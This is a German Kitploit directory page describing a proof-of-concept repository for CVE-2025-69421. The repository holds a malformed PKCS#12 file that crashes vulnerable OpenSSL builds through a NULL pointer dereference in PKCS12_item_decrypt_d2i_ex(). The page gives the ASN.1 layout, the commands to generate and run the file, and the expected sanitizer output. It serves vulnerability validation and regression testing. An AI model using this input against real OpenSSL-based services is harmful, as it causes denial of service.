Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2025-69421 | Kitploit
Tools/GitHubGitHub/kha-beleh/poc-cve-2025-69421
SchwachstellenanalyseExploitationFuzzingKryptographieBinäranalyseLernen & Bildung
GitHubkha-beleh/poc-cve-2025-69421

PoC-CVE-2025-69421

Repository anzeigen
vor 29 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69421 Nur-Absturz-Reproducer

Dieses Repository enthält eine minimale fehlerhafte PKCS#12-Datei, die CVE-2025-69421 in einer isolierten Laborumgebung reproduziert.

Die erzeugte PFX-Datei enthält EncryptedData, dessen EncryptedContentInfo das optionale Feld encryptedContent auslässt. Verwundbare OpenSSL-Versionen können einen NULL-Zeiger vom Typ ASN1_OCTET_STRING von PKCS12_unpack_p7encdata() an die Funktion PKCS12_item_decrypt_d2i_ex() übergeben, die diesen ohne NULL-Prüfung dereferenziert.

Dieser Reproducer demonstriert ausschließlich einen Denial-of-Service-Zustand. Er führt keinen Code aus und gibt keine Informationen preis.

Inhalt des Repositorys

root@kitploit:~
.
├── README.md
├── LICENSE
├── Makefile
├── generate.py
├── run.sh
├── malformed-cve-2025-69421.p12
└── evidence
    └── ubsan-output.txt

Voraussetzungen

  • Python 3
  • Ein verwundbarer OpenSSL-Build, kompiliert mit UBSan oder ASan/UBSan
  • OpenSSL 3.0.7 wurde für die bestätigte Reproduktion verwendet

Legen Sie das Build-Verzeichnis fest, bevor Sie den PoC ausführen:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
export OPENSSL_BIN="$OPENSSL_BUILD/apps/openssl"

OPENSSL_BUILD muss die verwundbare libcrypto.so.3 und das passende Binärprogramm apps/openssl enthalten.

Erzeugen der fehlerhaften PKCS#12-Datei

Eine vorab erzeugte Datei ist enthalten. Um sie neu zu erzeugen:

root@kitploit:~
python3 generate.py

Die Ausgabe ist:

root@kitploit:~
malformed-cve-2025-69421.p12

Die ASN.1-Struktur untersuchen

root@kitploit:~
openssl asn1parse \
  -inform DER \
  -in malformed-cve-2025-69421.p12 \
  -i

Die relevante Struktur ist:

root@kitploit:~
PFX
├── version = 3
└── authSafe: ContentInfo(data)
    └── OCTET STRING
        └── AuthenticatedSafe
            └── ContentInfo(encryptedData)
                └── EncryptedData
                    ├── version = 0
                    └── EncryptedContentInfo
                        ├── contentType = data
                        ├── algorithm = pbeWithSHA1And3-KeyTripleDES-CBC
                        └── encryptedContent = absent

Den Reproducer ausführen

Mit dem Hilfsskript:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
./run.sh

Entsprechender manueller Befehl:

root@kitploit:~
export OPENSSL_BUILD=/path/to/openssl-build
export OPENSSL_BIN="$OPENSSL_BUILD/apps/openssl"

ASAN_OPTIONS='abort_on_error=1:halt_on_error=1:detect_leaks=0:symbolize=1' \
UBSAN_OPTIONS='halt_on_error=1:print_stacktrace=1' \
LD_LIBRARY_PATH="$OPENSSL_BUILD" \
"$OPENSSL_BIN" pkcs12 \
  -in malformed-cve-2025-69421.p12 \
  -info \
  -noout \
  -passin pass:test

Erwartetes Ergebnis bei einem verwundbaren Build

root@kitploit:~
Warning: MAC is absent!
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1
crypto/pkcs12/p12_decr.c:140:66: runtime error: member access within null pointer of type 'const struct ASN1_OCTET_STRING'
    #0 0x... in PKCS12_item_decrypt_d2i_ex (/path/to/openssl-build/libcrypto.so.3+0x...)
    #1 0x... in PKCS12_unpack_p7encdata (/path/to/openssl-build/libcrypto.so.3+0x...)
    #2 0x... in dump_certs_keys_p12 (/path/to/openssl-build/apps/openssl+0x...)
    #3 0x... in pkcs12_main (/path/to/openssl-build/apps/openssl+0x...)

Die wichtigen Indikatoren sind:

root@kitploit:~
member access within null pointer
PKCS12_item_decrypt_d2i_ex
PKCS12_unpack_p7encdata

Erwartetes Ergebnis bei einem behobenen Build

Ein behobener OpenSSL-Build sollte die fehlerhafte Eingabe ohne Sanitizer-Meldung oder Prozessabsturz ablehnen. Die Fehlermeldung kann Folgendes enthalten:

root@kitploit:~
PKCS12_item_decrypt_d2i_ex:passed a null parameter

Technische Zusammenfassung

root@kitploit:~
CVE: CVE-2025-69421
Component: OpenSSL PKCS#12 processing
Trigger: EncryptedData with absent encryptedContent
Fault: NULL pointer dereference
Function: PKCS12_item_decrypt_d2i_ex()
Reachable through: PKCS12_unpack_p7encdata()
Impact: Denial of Service

Haftungsausschluss

Verwenden Sie diesen Reproducer nur auf Systemen, die Ihnen gehören oder für deren Test Sie ausdrücklich autorisiert sind. Das enthaltene Artefakt ist für defensive Validierung und Regressionstests bestimmt.

Tool herunterladen